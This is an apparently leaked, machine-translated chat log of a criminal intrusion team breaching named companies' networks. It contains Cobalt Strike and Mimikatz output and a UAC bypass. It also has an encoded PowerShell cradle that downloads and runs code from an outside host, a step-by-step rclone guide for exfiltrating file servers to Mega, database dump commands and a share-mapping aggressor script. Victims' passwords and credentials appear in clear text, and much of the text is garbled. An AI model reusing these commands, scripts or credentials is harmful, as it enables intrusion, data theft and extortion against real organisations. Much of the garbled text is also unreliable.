pull N servers at intervals of 5 seconds such a remark to us still have comments on the grid, other than the server stall?))mapper228+)))mapper? without lukashenko228 only adequateyou have the ability to choose a name for the alias, not critical it will be without graphics as I do not think it is necessary in this case if you want such a format - yes there can be a cna script, which is given a list ip, comma separated, and it matches these ircons in a specified session this optimizes the time during the mappa armatures result of processing you know and for each server copy line by line `` `` execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full ``Do yourself a blueprint of this command and you will see where you want it to go (text editor), and it will work like this: ``execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full` + now will be in development Marregvash task to make this map taking into account such small things as "the server does not open what to do "even just to 100 and from 100ya want you to get away 2 main outcomes: up to 100-150 servers and above and while you do not have internet you will take up writing roadmap for the process of running the build2 item my fault3) or you are nervous or something, but you forget too elementary things2) the process of our work in such cases is terrible1) I want to thank you for the process, the network was hard and unaccustomed, but you did it judging by the statistics and you need time to work the build itself 
you have 2 hours at most and speed up please for what) in the future I will know, thank you alwaysDOMENCHts not specified in the hostnameask a comrade easier) you have 5 people around what exactly is not configured as follows ?help him help him comrade still do not know how to set up a sheet for coba go to the confab+@tl1 all here hello4 min max max just a little bit and all will be soon when? soon all will be soon what's not all there yet? good morning add it he computer froze, about to reboot ...who to give in the group? @tl1 `` Domain = cn.net.ntes Adusers mail = mesg.corp.netease.com ``A couple more+you'll have sessions? \you have a name for the conf+? @user3 give kobu nearer to 2 will kobu be ready da@tl1 New sessions will be there? what progress? by 10 will be new sessions as a variant it is possible to get on dk through rdp for example if it is allowed it not da)is there any kredes?:thinking:? then this user can jump to dk if there dk is a dk they say the french mikat Authentication Id : 0 ; 63768393 (00000000:03cd0749) Session : Interactive from 0 User Name : nddevbernst Domain : JDOSSN Logon Server : JDODC64 Logon Time : 10/23/2020 2:15:49 PM SID : S-1-5-21-3450394983-289173729-1299264434-241049 ``in the output mimic or in the ad info? is that where the user went? logon seveer in the output mimicvoice in an hour still in questionnews by how much to expect? old are theresessions working?good afternoonhiGood afternoonTo avoid unnecessary noisedsync by the volume domain sootam already remove a couple of critical pkvm already work, as you prepare, I'll give you sessions from the 2 extended domainsvot yes from that domain) 
To dk from the main working domaina to the domain how to pass) `` Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data: Reply from 10.69.0.35: bytes=32 time=10ms TTL=127 Ping statistics for 10.69.0.35: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 10ms, Maximum = 10ms, Average = 10ms beacon> portscan 10.69.0.35 445 none [*] Tasked beacon to scan ports 445 on 10.69.0.35 [+] host called home, sent: 93285 bytes [+] received output: 10.69.0.35:445 Scanner module is complete ``Nothing to remove here, it's a prod segmentetad, dxink and so on to remove themselves or is there? the main domain near you are in the trust prodovom, do not touch it immediately do not rushschellyn.comdomain kobydavay+may offer another network to work until the news? do not remember, I think I saw where something i'll try the pass if you have it) do they have outlook clients? no, the pass does not fit, the ones i've tried the rest before the weekend user8 tried, but i don't know what he had there2fa? in the mail access to the neta with the mail we have what? browsers directly from ALL computers, also nothing else check the files, so far nothing (checked sccy? eight? One quit 4 in scythe all off, even in the center ping going nowhere, domain unreachable may well be lying useful dokuoksche pay attention to file servers in IT folders, let me know how you check it.Check the files, there is nothingThere are no browsers on all machines I think the chance is high enough5 people in a working day can find accesses? There are no creeds from nasovi then give out a couple of vpn, but there is no direct accesses.snu.edu deadlockedIt turns out that only sccy and snu.edu are out todayWill there be any new sessions? 
sccy seems to be a couple of sessions aliveWhile we check skytech, there are a couple of sessions there-is there anything alive in `CORP.TELEVISA.COM.MX`?what is it that you do not have enough of it? hello all for the first time hear lumisco.com, matches, gpj and? you are now in work 3 grids, before leaving for each report: what was done in the current task, what difficulties, what vectors, etc., started yes? oh how well in the test lab on Windows 10 version 1909 with defender on SharpFodhelperBypass works (https://github.com/FatRodzianko/SharpFodhelperBypass) sample run - execute-assembly /home/user/Desktop/SharpFodhelperBypass.exe Y21kIC9jIHJ1bmRsbDMyIEM6XFByb2dyYW1EYXRhXHg2NC5kbGwgZW50cnlQb2ludA== command in base64 (cmd /c rundll32 C:\ProgramData\x64.dll entryPoint) This thing works in a test lab on win 10 It opens cmd under admin, but you can't give it any arguments, i.e. tell it to run our exe or specify a command. what can be done with it then? https://github.com/hfiref0x/UACME https://github.com/L3cr0f/DccwBypassUAC this till lunchtime the problem is above + you need to look for methods of bypassing UAC, or fresh spoolsv On the forum lies, gave the link above Finish it is not real, I think it's infinite:space_invader:mindmap finished? Actually it helps to search for PCs assigned to users namely, in the "search for techs" task. you select them from ad_users and use this tool to find their PCs where there will be valuable information about the network, just need to be information about edr, backups, etc. Search for keywords like network, admin, tech, etc. `` 1This one exe under which you write in trethThere? so, is it not? 
I asked if you collected sharpshooter and you said yes. https://github.com/HunnicCyber/SharpSniper wft? 2 1 lol? let's put him in the aggressor whale. i can't find it on the netlogon. i got it, i lost 445 port results file. what kind of pc? i scanned all the adfinds on /24, only 3-4 computers in the game. did you look for vg and external backups? the spn has hyper-v replica service on several machines, this is the most i've seen. 0 trusts 37 servers 1205 armies I think if you pinged, it would be much less than that and how many servers, armies and trusts we have, there iscsi empty there's ehs, no creed there are two servers bgukhoveam there's a tiny bit of .bco-shares bally44backup there's a lot of backups nothing else found a la wsphere, hypervisors, etc any signs of cloud solutions? let's complicate the process today, let's check the WOL. then write to the group the number of pcs, arms and trusts chromium admins, chromium all polozakonea, ran through all computers where admins sat yesterday then today we close, admins surely had no hints of claud or vg on backups?yes there are all found, what do I need? found one more guy, his credentials do not bring up a session on three computers. i remove the credentials from them via CME the same thing There are a couple of subnets left to scan. so far nothing in bellimore still in search of the creeds from the echyotr write down, what are your results? in preparation for closing in balimorladno, clarified. if you are done with the lab go to the networks 3 days ago I tried to build a server, at what time do not remember. 
fuck.... I'm already confused on all sides.or am I misunderstanding? just not setting up and building the server so you were still busy with lab 3 days ago? for lab, should have been but nothing started on it. I put it aside, it's at my desk. Then I brought a different office on it started up and now it's spinning. Do you want me to describe the hardware? and this + I already saw it, it's just 16 minutes on the 22nd, counted as three days pieced together = assembled? What kind of server? 100% Yesterday today I did lab, I'm not sure. Before that I was piecing a server on a Chinese mother that does not fuckin' work! that was three days ago. so yesterday and today? yeah, yesterday. not much sleep. i don't remember what happened three days ago. I sign up uni yesterday yesterdayrahm, maybe I'm already confused uni it was yesterday ? gave you an individual problem on the vpn like, which then @user7 left, strong strong and so on)you said that the lab I remember the day before yesterday I asked you to work on the networkzakonchilked about 10 minutes ago. Do not count in hours. I think since yesterday, wrote to you. how much time was busy with this task? 
Finished with webmords, doesn't take much off found: 1 ushi (no creeds) 1 us (no kreds) iLO 4 ProLiant iLO 54 ProLiant the last two things have not figured out what they are, and no Credits iLO 4 ProLiant 54 ProLiant not yet figured out what they are, well, there are no Credits main.crispregional.org ``` also looking for hints on the backups in the vg and the cloudswrite at the same time, that on the tasks of all, let's go to the main tasks thank you tell me that he has 10 minutes to contact the boss promptly call pliz @ot let him answer bosu and here we are all trying to understand the situation if not then it turns out that @ot checked himself, none of us have checked so, aware of this kitchen were only @ot and @user3 no) and you sent them to check ?what's the problem with the tests? we don't know about it, only @ot does. ask the others about the tests - @ot tests - I don't know lab - @ot and @user3 the last one is closed, @user3 was busy configuring it so in order, who did the interviews, tests, labs maybe someone will have problems depending on your answers)okay, never mind, what do you mean by that? and i also talk about tests and labs we talk about the tests and the interviews specifically labs i mean what works with it, from what i observe, @user3 and tests who checked?@ot who conducted the interviews? so? so she rather under the direction of @user3 over which @user3 still works eeetu labaa)from2 is it who you know about the lab, tests and other things under the direction of @ot? distracted yet? then they immediately 1 dk and lifted the same pdkvot 1 dktakta all ok? List of DCs in Domain \\WDC1 (PDC) ``I did `shell nltest /dclist` without `:```` beacon> shell nltest /dclist: [*] Tasked beacon to run: nltest /dclist: [+] host called home, sent: 46 bytes [+] received output: Get list of DCs in domain '' from '\\WWDC1.waterway.com'. You don't have access to DsBind to (\\WWDC1.waterway.com) (Trying NetServerEnum). 
List of DCs in Domain \\WDC1 (PDC) The command completed successfully ``shell nltest /dclist:```` beacon> shell net accounts [*] Tasked beacon to run: net accounts [+] host called home, sent: 43 bytes [+] received output: Force user logoff how long after time expires?: Never Minimum password age (days): 1 Maximum password age (days): 90 Minimum password length: 6 Length of password history maintained: 10 Lockout threshold: 15 Lockout duration (minutes): 5 Lockout observation window (minutes): 5 Computer role: WORKSTATION The command completed successfully. ``nltest output beacon> net domain waterway.com beacon> net domain_controllers Domain Controllers: [-] Error: 0 beacon> shell nltest /dclist:waterway.com Get list of DCs in domain 'waterway.com' from '\\\WWDC1.waterway.com'. Cannot DsBind to waterway.com (\\WWDC1.waterway.com).Status = 1722 0x6ba RPC_SERVER_UNAVAILABLE I_NetGetDCList failed: Status = 6118 0x17e6 ERROR_NO_BROWSER_SERVERS_FOUND beacon> shell net accounts /dom The request will be processed at a domain controller for domain waterway.com. System error 5 has occurred. Access is denied. found ESXi, no credits yet checked all my DA's with sniper - they are sitting on servers, in chrome only one had password without username from unopened snout Checking of scanned interfaces is in process. sniper check all sysadmins and i.t. guys in the process I have a couple of sessions in the slipway, the water I have not seen nimble here, hashes are different, but not valid nimble is dead? all empty? not even hashes are different? 6 Computers where he was with the rights pulled and in them for now and stay. la was you did not have YES? hashes gave tl2 so far nothing interesting, other than what I wrote in the conf, did not findKred still not found, run the invey and caught some interesting information - the assumption that previously found seven in the yr and not in the domain looks reasonable, because found several other similar compounds. 
Scan the subnets to 445 443 22 80. Search the files on the computers where you have access to do not forget the cloud solutions. main.crispregional.org ``` There is a sphere, av, backups Looking for backups in the groups in `CORP.TELEVISA.COM.MX` I`ve jumped into `CORPSFECRT04` there is nothing on the creeds, now I'll go further untwisted Write down the status of work to get there. like any creeds fit there, but only as a normal polozaki maybe something like that : //www.zoller.info/en/products/tool-management/storage-systems/keeper) and what the drill can not kill? yeah hz. they sell weapons, and these drills assumption : //www.zoller.info/en/home?r=1``` 10.0.0.24 0EA78803 [Win Embedded Standard 7601 SP 1] Probably because it's some kind of cut-up sevens but you need prufy as a variant - that's the title of the crossover.com looking for crescendos with the rights. While I was looking for found ``. (platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER) ``and now looking for confirmation of a second domain, who works with it? access and other stuff, and looking for external, internal storage, and the quality of the locale itself, we'll give up on that about creating backups looking for backups, auth, then listings skul, mail, filescredits only no backups found#ballymoregroup-com check the web muzzles that naskanii naskanii write what are you doing? in another) push @user7 into the confab to see where everyone is at? hello:space_invader:everyone say goodbye until tomorrow it is mandatory items + cloud check backups in vorkgroups tomorrow will close a couple of networks and tomorrow by 6 pm will finalize `benihana.com starting user is neutered, kerbs are removed, hell is removed, ShareFinder is dropped `ballymoregroup.com found 2 nasa, one dead 2 backup servers found, listings made 2 exch of hell not pinging `Ping request could not find host` pinging whines in the process LA starter user on several machines. Went everywhere took off browsers, hashdump and mimic. 
From all of this found two different hashes YES, but apparently old. No Kerbs - writes something like ``[X] No users found to Kerberoast! `````` main.crispregional.org ``` What's left: backups to find, optionally AV tomorrow by 4 I think half an hour more, what are we up to today? ``` main.crispregional.org 10.1.20.213 SYSTEM * PROVATIONTEST ``that's what kind of silent excitermelanu and all and alive so I keeled it a long time ago better spawn it? why should it die in the first place it won't die do a better spawn first do a spawn kill the session will die psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt ````CheckShareAccess` ? ERROR: Invoke-ShareFinder : A parameter cannot be found that matches parameter name 'checkaccess'. ``where is the -checkaccess flag wev beacon> psinject 4540 x64 Invoke-ShareFinder I also wondered if it shows access balls, not just enum balls? ah, it's for that message) yeah, I don't know)) I thought roll call is to whom and where?sccy.com it turns out...no big deal, it turns out? not a wrong password? it says access denied it if you're talking about the sharfinder output there above look it up, access denied they have a lockout after 5 failed, i think how not to break it with the admin-not yet out of the point? i who works with benihana?hello, all hihi)hihi all helloTill tomorrow, thank you all, until tomorrow))restart the clientobnovanoya that is hung? More precisely teem server, probably hangs after lunch will give more sessions@user1 once said that you need time to put your records on modules and vectors in order, before lunch can deal with it yesThe second team helps first with emeralmatherials.com? Our sessions:hiDo they? 2 from the other team2 from the other teamwe're 4 not here yet? EPM is all have sessions? 
Good morningGood morningGood morningThen send the actual information to the confab so that everything was in front of me no, is everyone still? Yes, I'm still doping armas so we'll start soon so what.octave movement started Join with @user8 still...still quiet`` IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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 ``full'' powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ANgAwADgAaQBzADEAVABLAEUANgA5AHIAegBDAEgAdQB4AEQAOABBAFAAbABXAEUAUQBWAG0ATABJAHEAbwBmAFYASwBkAG8AMQBhADcAawAnACkAKQA7AA== Give me a load of the stuff you don't have...put the dlluwas supposed to be there yet. did it come?[ ](https://mediaeveryone.com/channel/general?msg=2K7rdb6f6WThpRqdB) ok if it doesn't come in 30 min, you'll write 30 min. put@user4 give me more silk code[ ](https://mediaeveryone.com/channel/general?msg=tXPbfeLk4E8h253QE) add me to the confutaq still 1 help @user8 he has a fat network there would not want to lose it, build a dll from kobyzhivoy there) my it?TomHolzerFordwhat's his? ask my guys if it's theirs. I'll tell you what's mine...I'm confused, yours is not)((I mean @user4) urlbig.com:443vrue, found yours now give others do not exist think about how you'll act just run your eyes over the Mapuhoto not worthwhile@user9 write out a plan to close by roadmap7[ ](https://mediaeveryone.com/channel/general?msg=R3BrByJd5Xknit5Jx) under whom? which did not have time? 
if so, then the conf is not me yesterday there was another - ballymoregroup.com if you can get it back, I can continue with it, or user8 help with 26 trustsconf under it there was another one, but it almost immediately offsolved - did not have time[ ](https://mediaeveryone.com/channel/general?msg=vr32eeF23pzvdXTJo) heremb I will now launch you there in general those with whom I workedwill see what to give me)no. but for today, yes)are you done with him? no. we were here with the router again poking around and you started at 6?[ ](https://mediaeveryone.com/channel/general?msg=9pJzNgC67kaNguRSm) writing, yesterday the last one at the end of the day went to the offethese means to sit idle?there is no active guys, I'm not a telepath, if you sit without work write write that people are working in the input sessions who like yesterday are still dead why sit silently I also do not have a live in the input cobb is there new? or after 3 am or until 6 pm you know the timing in my grid kst only 8 am @user9 if finished take another network to work) ah) I have it and build skid before closing) so ah close.we are not closing now why? @tl1 add us to @user9 in the confab, if it's not difficultselfspin.com sorting of servers and other information in the confab.hiB corbel.com all ready for closure then the plan for today is: 2 people who have already taken YES work in the same network and ready to close, the rest while lifting the rightsDa, but not all came up All alive, in good health and mind?HiTo all helloDa)morninG) to all goodnightTo all without misunderstandingTomorrow i.e. todayHappyTo all until tomorrow)hopefully in the eveningTo 6 khoroshoda, two?without "probably a normal grid" right? 
total 2 networks with Dada, also Dada and dll ran `MM-LIB` host where dll attached prokatitchekni then shtasku at the stage of work with vpnom it was in lrhstuck and did not solve[ ](https://mediaeveryone.com/channel/general?msg=Xj8qmsWoqKomTqCah) how did you solve?give the hostname also yes and dll is running? well i had at least so it was somysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysm's was there yes, looking for edtam hp) ohohohojitwinds you ten tomorrow will solve these cases get such `` beacon> shell net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER [*] Tasked beacon to run: net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER [+] host called home, sent: 95 bytes [+] received output: System error 384 has occurred. You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack. Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747 ``boys are part of a group of hp adminstrusts will scour tomorrow in the current one or trastaherstech.com, fishusa.com, holzerford.com - removed adinfo, kerbs, EA YES. all sessions are off.this is wherealloypolymers.com >description: password rbuilder >description: Generic GroupWise account for Adhesives. Password - pword >description: Password is pword. >description: Pword-flas21a. Deco 1 >description: The password is waglobal2014 Password does not expire >description: For Trackit SQL passqord is trackit114 >description: The service account for DCWAS08 Execel Password is VantgagePoint ``@user8 here's some food for thought for tomorrow if the session doesn't die[ ](https://mediaeveryone.com/channel/general?msg=A24quWh36NdPwR2Px) COGNOSPD.korbel.com dcsync was taken off, maybe the lab, now in slip, waiting for commands `wilsonart.com'. 
28 trusts, minus duplicates and quarantines - 7 7 trusts removed from hell, two trusts and the current domain removed from the kerbs@user9 say his hostnamecorbel.com There is a YES run the dll on the far server found sphere and creeds found edr and krediSnatched the AD, lifted the system, no kredi to move on, with nyah kerb kredi given for decryption.are there dll running on the servers and so yes to me exactly the network interests with YES which we will close tomorrowwrite reports on workMany of 2826 trusts)are you many left?+++ alive? you about the zealot do not forget? my keyloggers empty (there is nothing empty) they just work with shul and sometimes write to each other keyloggers have not checked? yes shul there all in #waterway-com uploading backups mail finance admins + deal with shul so what do you have?so the sooner we check everything for tomorrow the sooner we go to bedtoday we're closing 2 grids so the sooner we work the sooner you go hometodaytodaytodaytodaytodaytodaytoday by 6 and today we need to prepare everything for tomorrow i understand you're tiredtodaytoday we're closing the rt or till 00 work @tl2 @tl1 same, backups in water what are you busy doing?i did not try it, that's why i wrote it like with rdp)) try it without rdp? it pours very fast because of the high compression now there is no need for any 7za and unzipping the mega! everything is very quiet and unnoticeable! download rclon from the off-site. rclon.exe put it in the right directory, then everything according to the manual. I did everything through the rdp You register a mega, choose it from a huge list, which rclon provides us. rclon quietly connects to the mega and makes a clone of what you need. you can at least the whole fs. it downloads everything through rclon, so the download speed is high. Here's the guide. 
It's simple: https://rclone.org/mega/ Next, the command to download:
```
rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
```
`remote:NT` - change only this. "remote" is the name of your mega. "NT" is your directory in the mega where it will be downloaded to; if it doesn't exist, it will create it itself. Example:
```
rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
```
https://rclone.org/ if it requires some amount of data to be uploaded.

8. Backup database
```
sqlcmd -S localhost -E -Q "BACKUP DATABASE name TO DISK='C:\PerfLogs\name.bak'"
```
For a remote/other local server change localhost to ip,port, alternatively localhost,%port% (see netstat).

7. Output all tables of a specific database
```
sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W
```
With size in megabytes:
```
sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"
```
1. Display all databases on the server in cmd
```
sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
```
As soon as you jump into the process you look at the databases list; by default the sqlcmd tool is installed on the server, it has direct access to the data to back up (the sqlwriter, sqlsrv processes on the sql server). worked. I press the bind, nothing happens. what? @tl1 Doesn't work? https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/tools/1vpn check there, whereupon there is access to the domain, no load for him. hi. Hi, our evo vpn has fallen away. Hi Hi Hi. Well, now checking. Did you check wilson? Did the file appear on the unshared armas? Flew home. Where do we have @user9?
how unexpected and niceaaa we miss our family as much as you)missed you?)helloTo all helloDo you want me to ask everyone in the confuskinu to the appropriate confuaga, I'll dig in the records of strangers to see what there may be interestingthem the difficulty, as I understand from @user7 is to find a sphere / backups? well, let's finish today probably? there he is small aha)as you see - norrivet good evening! @tl1 not yet? BACKUP$ BACKUPDVR$ CHIBACKUP2020$ CLEBACKUP$ CLEBACKUP2020$ DVRBACKUP2020$ DVRNEWBACKUP20$ KCBACKUP2020$ KCNEWBACKUP2020$ NEWBACKUPCHI$ NEWBACKUPCLE$ `````` \BLAUERPC\D$ \DRB2\Archive \\{\DRB2\Backup \\Replication \\GKELLER/G$/Backup \\GKELLER/G$/WW2k1/IT/SolarwindsBackups \REPORTING\D$\SQLBackup \\Data\AKPRO_Data\BACKUPS \WW2K1\F$/Backup \WW2K1\F$Data\AKPRO_Data\BACKUPS \\{\WWSQL\S$\SQLBackup ``.``WATERWAY\blauer 11915Admin2179!```` http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99! WATERWAY\mharper LoveUnit14 ``Good evening. we're here)))))Thank you for such flattering words, and @tl1 is also a pleasure to work with I wish I could find some red words, but I'll just respond with... an anecdote! A pentester is walking through the desert, he wants sex, he meets a genie, and he asks him "What do you want, traveler?" -Fucking, says the pentester. And then out of nowhere appears a bunch of all sorts of spheres without creed, not decrypted hashes on kmd5, grids in which the domain is not visible and a billion all kinds of avers -Get the fuck out of here,‖ jinny answers. -Yes, the last thing I wanted to say, while you're resting, think about whether any of you want to take additional offline courses through the official pentester refresher course CEH, OSCP and the like So have a nice holidays) see you next year) Likewise) We are also happy to work with you )From us too we want to say thank you, it is a very useful experience, especially in a short period of time. 
My head is boiling, but it is interesting) Happy New Year to you = ) )In short - all are good) the most difficult passed) further will only be more interesting) from my experience, I say that in comparison, you are growing very fast on the technical part, small zatupy have all, and this is normal But next year we'll get to a completely different speed, start parallel technologies, dig nixes i for my part and @tl1 and the development team will also be preparing some cool stuff for you hope i am not mistaken)and for a very short time by the standards of junior pentests we have come a long way from 0 to the current cases with the flag -nomutex so i want to share my impressionsthen see you soon) backups in work, the backups are working and i'll be back up by 21 til next tuesday. i will be back up by 21 tuesday but report here now please = ) so @tl1 knows what's the plan) who can today - pull up to 21 if no one can, go on vacation I don't know anything.) At @tl1 let's ask)last day also in case of success? >last case on the last dayvono, of course, no problem, if anyone else can not - say, today "at will" with bonuses in case of success of the work itselfvtl1 we'll do the last case at all I have a day of groundhogs I just looked at the calendar for the first time in a week and a half or two I will be able to communicate, but not in the office, in the evening I fly away I was planning to go on holiday today, so the tickets are bought( i think the guys will cope with a small network without me a good question, i think to finish some last case on the last day =)and for what, like we said on holidays go away ... friends, today's case comes to an end, as the final touches to backup will be solved, the server and workstation checked - all go to rest @tl1 said before leaving that we're going to 21, have time to rest?[ ](https://mediaeveryone.com/channel/general?msg=FtyaEbnGv588f4knR) Well, another plus exeshnik is a lot of threads. 
icacls is a long command, I added grant full, so the exe seemed easier) there the bat file also complained - and Teamlead2 said, I threw it to you in private, something about regulars, etc. so policies are swearing more, eh. On exe and to scatter, a bat file is easier than an exe, the same in order to scatter on the machines. Why not a bat file? And build me one, in the lab it runs, come on. If grant full works fine then add it to the exe - a minute. And so and so ran from the admin? I checked the bat file in the lab - no problem with this. no - a workgroup machine outside the domain?
```
Node Name:                 DESKTOP-5SMSDNR
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18363 N/A
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          User
Registered Organization:
Product ID:                00330-80000-00000-AA618
Original Install Date:     09/16/2020, 13:38:44
System Boot Time:          12/22/2020, 1:54:35
System Manufacturer:       Gigabyte Technology Co.
System Model:              G31M-ES2L
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2834 MHz
BIOS Version:              Award Software International, Inc. FF, 10/13/2009
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             ru;Russian
Input Locale:              ru;Russian
Time Zone:                 (UTC+03:00) Moscow, St. Petersburg
Total Physical Memory:     4,085 MB
Available Physical Memory: 715 MB
Virtual Memory: Max Size:  5,621 MB
Virtual Memory: Available: 828 MB
Virtual Memory: In Use:    4,793 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\DESKTOP-5SMSDNR
Hotfix(s):                 12 Hotfix(s) Installed.
                           [01]: KB4586878
                           [02]: KB4513661
                           [03]: KB4516115
                           [04]: KB4517245
                           [05]: KB4521863
                           [06]: KB4561600
                           [07]: KB4576751
                           [08]: KB4576754
                           [09]: KB4577670
                           [10]: KB4580325
                           [11]: KB4586863
                           [12]: KB4592449
Network Card(s):           2 NIC(s) Installed.
                           [01]: Qualcomm Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.30)
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.88.1
                                 IP address(es)
                                 [01]: 192.168.88.248
                                 [02]: fe80::d935:55:e14f:fe49
                           [02]: VirtualBox Host-Only Ethernet Adapter
                                 Connection Name: VirtualBox Host-Only Network
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.56.1
                                 [02]: fe80::f4c1:748b:225c:98a0
Hyper-V Requirements:      VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: Yes
                           Second Level Address Translation: No
                           Data Execution Prevention Available: Yes
```
win10, version, OS etc. Where do you run it?
```
System error 1332 has occurred.
No mapping between account names and security IDs was done.
```
there - where? Without grant full, it's just going the wrong way.
```
C:\Users\awilson\Desktop>1.bat

C:\Users\awilson\Desktop>net share c=c: /grant:everyone,full
c was shared successfully.

C:\Users\awilson\Desktop>net share d=d: /grant:everyone,full
d was shared successfully.

C:\Users\awilson\Desktop>net share e=e: /grant:everyone,full
The device or directory does not exist.
More help is available by typing NET HELPMSG 2116.

C:\Users\awilson\Desktop>net share f=f: /grant:everyone,full
The device or directory does not exist.
More help is available by typing NET HELPMSG 2116.

C:\Users\awilson\Desktop>net share g=g: /grant:everyone,full
The device or directory does not exist.
More help is available by typing NET HELPMSG 2116.
```
`NET share A=A: / grant:everyone,full` - you have a space there. The same principle:
```
C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: / grant:everyone,full
Unknown parameter /.
The syntax of this command is:

NET SHARE
sharename
          sharename=drive:path [/GRANT:user,[READ | CHANGE | FULL]]
                               [/USERS:number | /UNLIMITED]
                               [/REMARK:"text"]
                               [/CACHE:Manual | Documents| Programs | BranchCache | None]
          sharename [/USERS:number | /UNLIMITED]
                    [/REMARK:"text"]
                    [/CACHE:Manual | Documents | Programs | BranchCache | None]
          {sharename | devicename | drive:path} /DELETE
          sharename \\computername /DELETE

For more help, type NET HELPMSG 3506.

C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: /grant:everyone,full
System error 1332 has occurred.
No mapping between account names and security IDs was done.
```
Well, I ran the lead on our office computer. win10. What was the environment? So it was in the bat file and it was swearing. Then you can't do without the bat file, like "I can't match something with something". I don't know what it's swearing about? `/grant:everyone,full` - it's not working at all. `/grant Everyone:F /T /C /Q` vs `/grant:everyone,full` - did you take this into account? Didn't you make this one? Not this one? What was the bat file and the exe? I won't answer, you'll get scolded. Did you make the bat file and then the exe, by any chance did you save it? Good question, I do not know which of the confs it was written in. Guys who remember where @tl2 wrote about the drive shares, please copy them to the host specified in the second argument) mapped only c$ shares, thank you)
```
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:28> share-mapper KCNEWBACKUP2020
[*] Attaching c$ in KCNEWBACKUP2020 host
[*] Tasked beacon to run: net use * \\KCNEWBACKUP2020\c$ /PERSISTENT:YES
[*] Tasked beacon to run: net use
[+] host called home, sent: 115 bytes
[+] received output:
Drive Z: is now connected to \\KCNEWBACKUP2020\c$.

The command completed successfully.

[+] received output:
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           Z:        \\KCNEWBACKUP2020\c$      Microsoft Windows Network
The command completed successfully.

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:51> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           Z:        \\KCNEWBACKUP2020\c$      Microsoft Windows Network
The command completed successfully.
```
Check.
```
#ShareMapper.cna
#Author: @noname
#no desc

beacon_command_register("share-mapper", "shares attacher", "Syntax: share-mapper [hostname1,hostname2,hostname3,hostname4]");

alias share-mapper {
    if ($2 is $null) {
        berror($1, "Need hosts!");
    } else {
        # comma-separated host list from the second argument
        @hsts = split(",", ["$2" trim]);
        foreach $entry (@hsts) {
            blog2($1, "Attaching c\$ in $entry host");
            # map the admin share of each host to the next free drive letter
            bshell($1, "net use * \\\\$entry\\c\$ /PERSISTENT:YES");
        }
        # list the resulting mappings
        bshell($1, "net use");
    }
}
```
